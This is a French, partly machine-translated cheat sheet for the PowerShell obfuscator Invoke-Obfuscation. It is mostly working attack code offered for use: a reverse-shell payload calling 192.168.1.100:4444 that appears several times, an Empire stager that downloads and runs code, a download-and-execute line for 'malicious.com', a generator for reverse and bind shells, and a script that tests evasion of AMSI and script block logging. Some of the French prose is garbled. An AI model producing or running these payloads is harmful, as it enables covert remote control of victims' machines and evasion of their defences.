Aller au contenu

Feuille de chaleur à évoke-obfuscation

Copier toutes les commandes Générer PDF

Aperçu général

Invoke-Obfuscation est une puissance Puissance compatible Shell v2.0+ Commande Shell et obfuscator de script. Il a été conçu pour aider les équipiers rouges et les testeurs de pénétration à contourner les antivirus, la liste blanche d'application, et d'autres mesures défensives en obfustant les scripts et les commandes PowerShell. L'outil fournit de multiples techniques d'obfuscation, y compris l'obfuscation à base de jetons, l'obfuscation de cordes, l'encodage et la compression.

C'est pas vrai. Attention: N'utilisez Invoke-Obfuscation que dans les environnements que vous possédez ou avez la permission explicite de tester. Une utilisation non autorisée peut violer les conditions de service ou les lois locales. Cet outil est destiné à des fins de tests de sécurité légitimes seulement.

Installation

Installation de la galerie PowerShell

# Install from PowerShell Gallery (recommended)
Install-Module -Name Invoke-Obfuscation -Force

# Import the module
Import-Module Invoke-Obfuscation

# Verify installation
Get-Command -Module Invoke-Obfuscation

Installation manuelle

# Download from GitHub
Invoke-WebRequest -Uri "https://github.com/danielbohannon/Invoke-Obfuscation/archive/master.zip" -OutFile "Invoke-Obfuscation.zip"

# Extract the archive
Expand-Archive -Path "Invoke-Obfuscation.zip" -DestinationPath "C:\Tools\"

# Import the module
Import-Module "C:\Tools\Invoke-Obfuscation-master\Invoke-Obfuscation.psd1"

# Or add to PowerShell profile for persistent loading
$ProfilePath = $PROFILE.AllUsersAllHosts
if (!(Test-Path $ProfilePath)) \\\\{ New-Item -Path $ProfilePath -ItemType File -Force \\\\}
Add-Content -Path $ProfilePath -Value "Import-Module C:\Tools\Invoke-Obfuscation-master\Invoke-Obfuscation.psd1"
```_

### Installation Git
```bash
# Clone the repository
git clone https://github.com/danielbohannon/Invoke-Obfuscation.git
cd Invoke-Obfuscation

# Import in PowerShell
powershell -Command "Import-Module .\Invoke-Obfuscation.psd1"
```_

### Installation de Kali Linux
```bash
# Install PowerShell on Kali Linux
sudo apt update
sudo apt install -y powershell

# Start PowerShell
pwsh

# Install Invoke-Obfuscation
Install-Module -Name Invoke-Obfuscation -Force
Import-Module Invoke-Obfuscation

Utilisation de base

Mode interactif

# Start interactive obfuscation session
Invoke-Obfuscation

# Set script to obfuscate
SET SCRIPTPATH C:\Scripts\payload.ps1

# Set script block to obfuscate
SET SCRIPTBLOCK \\\\{Get-Process; Get-Service\\\\}

# Show current settings
SHOW OPTIONS

# Show available obfuscation types
SHOW

# Get help
HELP

Mode ligne de commande

# Obfuscate a script file
Invoke-Obfuscation -ScriptPath "C:\Scripts\payload.ps1" -Command "TOKEN\ALL\1" -Quiet

# Obfuscate a script block
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "STRING\1" -Quiet

# Obfuscate with multiple techniques
Invoke-Obfuscation -ScriptPath "C:\Scripts\payload.ps1" -Command "TOKEN\ALL\1,ENCODING\1" -Quiet

# Save obfuscated output to file
Invoke-Obfuscation -ScriptPath "C:\Scripts\payload.ps1" -Command "TOKEN\ALL\1" -Quiet|Out-File "C:\Scripts\obfuscated.ps1"

Techniques d'obfusation

Obfuscation des jetons

# Obfuscate all tokens with random case
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "TOKEN\ALL\1" -Quiet

# Obfuscate specific token types
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "TOKEN\COMMAND\1" -Quiet
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "TOKEN\COMMANDARGUMENT\1" -Quiet
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "TOKEN\MEMBER\1" -Quiet
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "TOKEN\VARIABLE\1" -Quiet

# Advanced token obfuscation
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "TOKEN\ALL\2" -Quiet
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "TOKEN\ALL\3" -Quiet

Obfuscation des chaînes

# Concatenate strings
Invoke-Obfuscation -ScriptBlock \\\\{'Hello World'\\\\} -Command "STRING\1" -Quiet

# Reorder strings
Invoke-Obfuscation -ScriptBlock \\\\{'Hello World'\\\\} -Command "STRING\2" -Quiet

# Reverse strings
Invoke-Obfuscation -ScriptBlock \\\\{'Hello World'\\\\} -Command "STRING\3" -Quiet

# Advanced string obfuscation
$script = \\\\{
    $message = "This is a test message"
    Write-Host $message
\\\\}
Invoke-Obfuscation -ScriptBlock $script -Command "STRING\1" -Quiet

Encodage Obfuscation

# ASCII encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\1" -Quiet

# Hex encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\2" -Quiet

# Octal encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\3" -Quiet

# Binary encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\4" -Quiet

# SecureString encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\5" -Quiet

# BXOR encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\6" -Quiet

# Special character encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\7" -Quiet

# Whitespace encoding
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "ENCODING\8" -Quiet

Obfuscation par compression

# GZip compression
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process; Get-Service; Get-EventLog -LogName System -Newest 10\\\\} -Command "COMPRESS\1" -Quiet

# Deflate compression
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process; Get-Service; Get-EventLog -LogName System -Newest 10\\\\} -Command "COMPRESS\2" -Quiet

Obfuscation du lanceur

# PowerShell launcher
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "LAUNCHER\PS\1" -Quiet

# CMD launcher
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "LAUNCHER\CMD\1" -Quiet

# WMIC launcher
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "LAUNCHER\WMIC\1" -Quiet

# Rundll32 launcher
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "LAUNCHER\RUNDLL32\1" -Quiet

# VAR+ launcher (advanced)
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "LAUNCHER\VAR+\1" -Quiet

# STDIN+ launcher
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "LAUNCHER\STDIN+\1" -Quiet

# CLIP+ launcher
Invoke-Obfuscation -ScriptBlock \\\\{Get-Process\\\\} -Command "LAUNCHER\CLIP+\1" -Quiet

Obfuscation avancée

Obfuscation multicouche

# Apply multiple obfuscation techniques
$script = \\\\{
    $processes = Get-Process
    $services = Get-Service
    Write-Host "Found $($processes.Count) processes and $($services.Count) services"
\\\\}

# Layer 1: Token obfuscation
$obfuscated1 = Invoke-Obfuscation -ScriptBlock $script -Command "TOKEN\ALL\1" -Quiet

# Layer 2: String obfuscation
$obfuscated2 = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($obfuscated1)) -Command "STRING\1" -Quiet

# Layer 3: Encoding
$obfuscated3 = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($obfuscated2)) -Command "ENCODING\1" -Quiet

# Layer 4: Compression
$final = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($obfuscated3)) -Command "COMPRESS\1" -Quiet

Write-Host $final

Chaînes d'obfuscation personnalisées

# Define obfuscation chain
$obfuscationChain = @(
    "TOKEN\ALL\1",
    "STRING\2",
    "ENCODING\3",
    "LAUNCHER\PS\1"
)

# Apply chain to script
$script = \\\\{
    Invoke-WebRequest -Uri "http://malicious.com/payload.ps1"|Invoke-Expression
\\\\}

$result = $script
foreach ($command in $obfuscationChain) \\\\{
    $result = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($result)) -Command $command -Quiet
\\\\}

Write-Host $result

Obfuscation spécifique de la charge utile

# Obfuscate Meterpreter payload
$meterpreterPayload = \\\\{
    $client = New-Object System.Net.Sockets.TCPClient("192.168.1.100",4444)
    $stream = $client.GetStream()
    [byte[]]$bytes = 0..65535|%\\\\{0\\\\}
    while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) \\\\{
        $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
        $sendback = (iex $data 2>&1|Out-String )
        $sendback2 = $sendback + "PS " + (pwd).Path + "> "
        $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
        $stream.Write($sendbyte,0,$sendbyte.Length)
        $stream.Flush()
    \\\\}
    $client.Close()
\\\\}

$obfuscatedMeterpreter = Invoke-Obfuscation -ScriptBlock $meterpreterPayload -Command "TOKEN\ALL\1,STRING\1,ENCODING\1" -Quiet

Obfuscation de la charge utile Empire/Couvant

# Obfuscate Empire stager
$empireStager = \\\\{
    $wc=New-Object System.Net.WebClient
    $u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
    $wc.Headers.Add('User-Agent',$u)
    $wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy
    $wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
    $Script:Proxy = $wc.Proxy
    $K=[System.Text.Encoding]::ASCII.GetBytes('staging_key_here')
    $R=\\\\{$D,$K=$Args;$S=0..255;0..255|%\\\\{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]\\\\};$D|%\\\\{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]\\\\}\\\\}
    $ser='http://192.168.1.100:80'
    $t='/admin/get.php'
    $wc.Headers.Add("Cookie","session=value")
    $data=$wc.DownloadData($ser+$t)
    $iv=$data[0..3];$data=$data[4..$data.length]
    -join[Char[]](& $R $data ($IV+$K))|IEX
\\\\}

$obfuscatedEmpire = Invoke-Obfuscation -ScriptBlock $empireStager -Command "TOKEN\ALL\2,STRING\2,ENCODING\2,LAUNCHER\PS\1" -Quiet

Scripts d'automatisation

Scénario d'obfuscation des lots

# Batch obfuscation script
param(
    [Parameter(Mandatory=$true)]
    [string]$InputDirectory,

    [Parameter(Mandatory=$true)]
    [string]$OutputDirectory,

    [string[]]$ObfuscationCommands = @("TOKEN\ALL\1", "STRING\1", "ENCODING\1")
)

# Create output directory if it doesn't exist
if (!(Test-Path $OutputDirectory)) \\\\{
    New-Item -ItemType Directory -Path $OutputDirectory -Force
\\\\}

# Get all PowerShell files
$psFiles = Get-ChildItem -Path $InputDirectory -Filter "*.ps1" -Recurse

foreach ($file in $psFiles) \\\\{
    Write-Host "[+] Processing: $($file.Name)"

    try \\\\{
        # Read the script content
        $scriptContent = Get-Content -Path $file.FullName -Raw
        $scriptBlock = [ScriptBlock]::Create($scriptContent)

        # Apply obfuscation
        $obfuscated = $scriptContent
        foreach ($command in $ObfuscationCommands) \\\\{
            Write-Host "  Applying: $command"
            $obfuscated = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($obfuscated)) -Command $command -Quiet
        \\\\}

        # Save obfuscated script
        $outputPath = Join-Path $OutputDirectory "$($file.BaseName)_obfuscated.ps1"
        $obfuscated|Out-File -FilePath $outputPath -Encoding UTF8

        Write-Host "  ✓ Saved: $outputPath"

    \\\\} catch \\\\{
        Write-Host "  ✗ Error: $($_.Exception.Message)" -ForegroundColor Red
    \\\\}
\\\\}

Write-Host "[+] Batch obfuscation completed"

Script du générateur de charge utile

# Advanced payload generator with obfuscation
param(
    [Parameter(Mandatory=$true)]
    [string]$LHOST,

    [Parameter(Mandatory=$true)]
    [int]$LPORT,

    [string]$PayloadType = "reverse_tcp",
    [string]$OutputPath = ".\obfuscated_payload.ps1",
    [string[]]$ObfuscationLevels = @("TOKEN\ALL\1", "STRING\1", "ENCODING\1")
)

# Define payload templates
$payloadTemplates = @\\\\{
    "reverse_tcp" = @"
`$client = New-Object System.Net.Sockets.TCPClient('$LHOST',$LPORT)
`$stream = `$client.GetStream()
[byte[]]`$bytes = 0..65535|%\\\\{0\\\\}
while((`$i = `$stream.Read(`$bytes, 0, `$bytes.Length)) -ne 0) \\\\{
    `$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$bytes,0, `$i)
    `$sendback = (iex `$data 2>&1|Out-String)
    `$sendback2 = `$sendback + 'PS ' + (pwd).Path + '> '
    `$sendbyte = ([text.encoding]::ASCII).GetBytes(`$sendback2)
    `$stream.Write(`$sendbyte,0,`$sendbyte.Length)
    `$stream.Flush()
\\}
`$client.Close()
"@

    "reverse_http" = @"
`$wc = New-Object System.Net.WebClient
`$wc.Headers.Add('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36')
while(`$true) \\{
    try \\{
        `$command = `$wc.DownloadString('http://$LHOST`:$LPORT/command')
        if (`$command) \\{
            `$result = iex `$command 2>&1|Out-String
            `$wc.UploadString('http://$LHOST`:$LPORT/result', `$result)
        \\\\}
        Start-Sleep -Seconds 5
    \\\\} catch \\\\{
        Start-Sleep -Seconds 10
    \\\\}
\\\\}
"@

    "bind_tcp" = @"
`$listener = [System.Net.Sockets.TcpListener]$LPORT
`$listener.Start()
`$client = `$listener.AcceptTcpClient()
`$stream = `$client.GetStream()
[byte[]]`$bytes = 0..65535|%\\{0\\}
while((`$i = `$stream.Read(`$bytes, 0, `$bytes.Length)) -ne 0) \\{
    `$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$bytes,0, `$i)
    `$sendback = (iex `$data 2>&1|Out-String)
    `$sendback2 = `$sendback + 'PS ' + (pwd).Path + '> '
    `$sendbyte = ([text.encoding]::ASCII).GetBytes(`$sendback2)
    `$stream.Write(`$sendbyte,0,`$sendbyte.Length)
    `$stream.Flush()
\\\\}
`$client.Close()
`$listener.Stop()
"@
\\\\}

# Generate base payload
if ($payloadTemplates.ContainsKey($PayloadType)) \\\\{
    $basePayload = $payloadTemplates[$PayloadType]
    Write-Host "[+] Generated $PayloadType payload for $LHOST`:$LPORT"
\\} else \\{
    Write-Host "[-] Unknown payload type: $PayloadType" -ForegroundColor Red
    return
\\}

# Apply obfuscation
$obfuscatedPayload = $basePayload
foreach ($level in $ObfuscationLevels) \\{
    Write-Host "[+] Applying obfuscation: $level"
    $obfuscatedPayload = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($obfuscatedPayload)) -Command $level -Quiet
\\}

# Save to file
$obfuscatedPayload|Out-File -FilePath $OutputPath -Encoding UTF8
Write-Host "[+] Obfuscated payload saved to: $OutputPath"

# Generate launcher commands
Write-Host "`n[+] Launcher commands:"
Write-Host "PowerShell: powershell.exe -ExecutionPolicy Bypass -File `"$OutputPath`""
Write-Host "Encoded: powershell.exe -EncodedCommand $([Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($obfuscatedPayload)))"

# Generate one-liner
$oneLiner = $obfuscatedPayload -replace "`r`n", "; " -replace "`n", "; "
Write-Host "`n[+] One-liner:"
Write-Host "powershell.exe -Command `"$oneLiner`""

Scénario de test d'évacuation

# Test obfuscated payloads against AMSI and other defenses
param(
    [Parameter(Mandatory=$true)]
    [string]$PayloadPath,

    [switch]$TestAMSI,
    [switch]$TestExecutionPolicy,
    [switch]$TestScriptBlockLogging,
    [switch]$All
)

if ($All) \\\\{
    $TestAMSI = $true
    $TestExecutionPolicy = $true
    $TestScriptBlockLogging = $true
\\\\}

Write-Host "[+] Testing payload: $PayloadPath"

# Read payload
$payload = Get-Content -Path $PayloadPath -Raw

# Test AMSI
if ($TestAMSI) \\\\{
    Write-Host "`n[+] Testing AMSI detection..."

    try \\{
        # Check if AMSI detects the payload
        $amsiContext = [System.IntPtr]::Zero
        $amsiSession = [System.IntPtr]::Zero

        # This is a simplified test - in reality, AMSI testing is more complex
        $result = [System.Management.Automation.AmsiUtils]::ScanContent($payload, "test")

        if ($result -eq "Clean") \\{
            Write-Host "  ✓ AMSI: Clean" -ForegroundColor Green
        \\} else \\{
            Write-Host "  ✗ AMSI: Detected" -ForegroundColor Red
        \\}
    \\} catch \\{
        Write-Host "  ? AMSI: Unable to test" -ForegroundColor Yellow
    \\}
\\}

# Test Execution Policy
if ($TestExecutionPolicy) \\{
    Write-Host "`n[+] Testing Execution Policy bypass..."

    $currentPolicy = Get-ExecutionPolicy
    Write-Host "  Current policy: $currentPolicy"

    if ($currentPolicy -eq "Restricted" -or $currentPolicy -eq "AllSigned") \\\\{
        Write-Host "  ⚠ Restrictive policy detected" -ForegroundColor Yellow
        Write-Host "  Bypass methods:"
        Write-Host "    powershell.exe -ExecutionPolicy Bypass -File `"$PayloadPath`""
        Write-Host "    powershell.exe -Command `"Set-ExecutionPolicy Bypass -Scope Process; & '$PayloadPath'`""
    \\\\} else \\\\{
        Write-Host "  ✓ Policy allows execution" -ForegroundColor Green
    \\\\}
\\\\}

# Test Script Block Logging
if ($TestScriptBlockLogging) \\\\{
    Write-Host "`n[+] Testing Script Block Logging evasion..."

    $logPolicy = Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -ErrorAction SilentlyContinue

    if ($logPolicy -and $logPolicy.EnableScriptBlockLogging -eq 1) \\{
        Write-Host "  ⚠ Script Block Logging is enabled" -ForegroundColor Yellow
        Write-Host "  Consider additional obfuscation or AMSI bypass"
    \\} else \\{
        Write-Host "  ✓ Script Block Logging not detected" -ForegroundColor Green
    \\}
\\}

# Test payload execution (dry run)
Write-Host "`n[+] Testing payload syntax..."
try \\\\{
    $scriptBlock = [ScriptBlock]::Create($payload)
    Write-Host "  ✓ Syntax is valid" -ForegroundColor Green
\\\\} catch \\\\{
    Write-Host "  ✗ Syntax error: $($_.Exception.Message)" -ForegroundColor Red
\\\\}

Write-Host "`n[+] Testing completed"

Intégration avec les cadres d'attaque

Intégration des métadonnées

# Generate obfuscated Metasploit payload
$msfPayload = @"
`$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444)
`$stream = `$client.GetStream()
[byte[]]`$bytes = 0..65535|%\\{0\\}
while((`$i = `$stream.Read(`$bytes, 0, `$bytes.Length)) -ne 0) \\{
    `$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$bytes,0, `$i)
    `$sendback = (iex `$data 2>&1|Out-String)
    `$sendback2 = `$sendback + 'PS ' + (pwd).Path + '> '
    `$sendbyte = ([text.encoding]::ASCII).GetBytes(`$sendback2)
    `$stream.Write(`$sendbyte,0,`$sendbyte.Length)
    `$stream.Flush()
\\\\}
`$client.Close()
"@

# Obfuscate for Metasploit
$obfuscatedMSF = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($msfPayload)) -Command "TOKEN\ALL\1,STRING\1,ENCODING\1,LAUNCHER\PS\1" -Quiet

# Save for use with Metasploit
$obfuscatedMSF|Out-File -FilePath "msf_payload_obfuscated.ps1"

Intégration de l'Empire

# Obfuscate Empire stager
$empireStager = \\{
    # Empire stager code here
    $wc=New-Object System.Net.WebClient
    $u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'
    $wc.Headers.Add('User-Agent',$u)
    # ... rest of Empire stager
\\}

# Apply heavy obfuscation for Empire
$obfuscatedEmpire = Invoke-Obfuscation -ScriptBlock $empireStager -Command "TOKEN\ALL\2,STRING\2,ENCODING\2,COMPRESS\1,LAUNCHER\VAR+\1" -Quiet

Intégration du Pacte

# Obfuscate Covenant Grunt
$covenantGrunt = \\{
    # Covenant Grunt code here
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = \\{$true\\}
    $wc = New-Object System.Net.WebClient
    # ... rest of Covenant Grunt
\\}

# Apply obfuscation for Covenant
$obfuscatedCovenant = Invoke-Obfuscation -ScriptBlock $covenantGrunt -Command "TOKEN\ALL\1,STRING\1,ENCODING\3,LAUNCHER\RUNDLL32\1" -Quiet

Dépannage

Questions communes

Problèmes d'importation de modules

# Fix module import issues
Import-Module Invoke-Obfuscation -Force

# Check module location
Get-Module -ListAvailable|Where-Object \\{$_.Name -like "*Obfuscation*"\\}

# Manual import
Import-Module "C:\Path\To\Invoke-Obfuscation.psd1"

# Check PowerShell execution policy
Get-ExecutionPolicy
Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser

Erreurs d'obfuscation

# Debug obfuscation issues
$ErrorActionPreference = "Stop"
try \\{
    $result = Invoke-Obfuscation -ScriptBlock \\{Get-Process\\} -Command "TOKEN\ALL\1" -Quiet
\\} catch \\{
    Write-Host "Error: $($_.Exception.Message)"
    Write-Host "Stack Trace: $($_.ScriptStackTrace)"
\\}

# Test with simpler commands
Invoke-Obfuscation -ScriptBlock \\{Write-Host "Test"\\} -Command "STRING\1" -Quiet

# Check PowerShell version compatibility
$PSVersionTable.PSVersion

Problèmes de performance

# Optimize for large scripts
$script = Get-Content -Path "large_script.ps1" -Raw

# Use simpler obfuscation for large scripts
$obfuscated = Invoke-Obfuscation -ScriptBlock ([ScriptBlock]::Create($script)) -Command "TOKEN\COMMAND\1" -Quiet

# Process in chunks for very large scripts
$lines = Get-Content -Path "large_script.ps1"
$chunkSize = 100
for ($i = 0; $i -lt $lines.Count; $i += $chunkSize) \\{
    $chunk = $lines[$i..($i + $chunkSize - 1)] -join "`n"
    # Process chunk
\\\\}

Débogue et essais

# Test obfuscated script execution
$obfuscated = Invoke-Obfuscation -ScriptBlock \\\\{Get-Date\\\\} -Command "TOKEN\ALL\1" -Quiet

# Execute obfuscated script
Invoke-Expression $obfuscated

# Compare original vs obfuscated output
$original = Get-Date
$obfuscatedResult = Invoke-Expression $obfuscated
Compare-Object $original $obfuscatedResult

# Validate script syntax
$scriptBlock = [ScriptBlock]::Create($obfuscated)
$scriptBlock.CheckRestrictedLanguage($false)

Ressources

  • [Répertoire officiel d'Invoke-Obfuscation] (LINK_7)
  • [Techniques d'obstruction PowerShell] (LINK_7)
  • [Techniques de dérivation de l'ISAM] (LINK_7)
  • [Meilleures pratiques en matière de sécurité PowerShell] (LINK_7)
  • [Script Block Logging] (LINK_7)
  • [Politiques d'exécution de PowerShell] (LINK_7)
  • [Techniques de PowerShell de l'équipe rouge] (LINK_7)

*Cette feuille de triche fournit une référence complète pour l'utilisation du script Invoke-Obfuscation pour PowerShell et l'obfuscation des commandes. Assurez-vous toujours d'avoir une autorisation appropriée avant d'utiliser cet outil dans n'importe quel environnement. *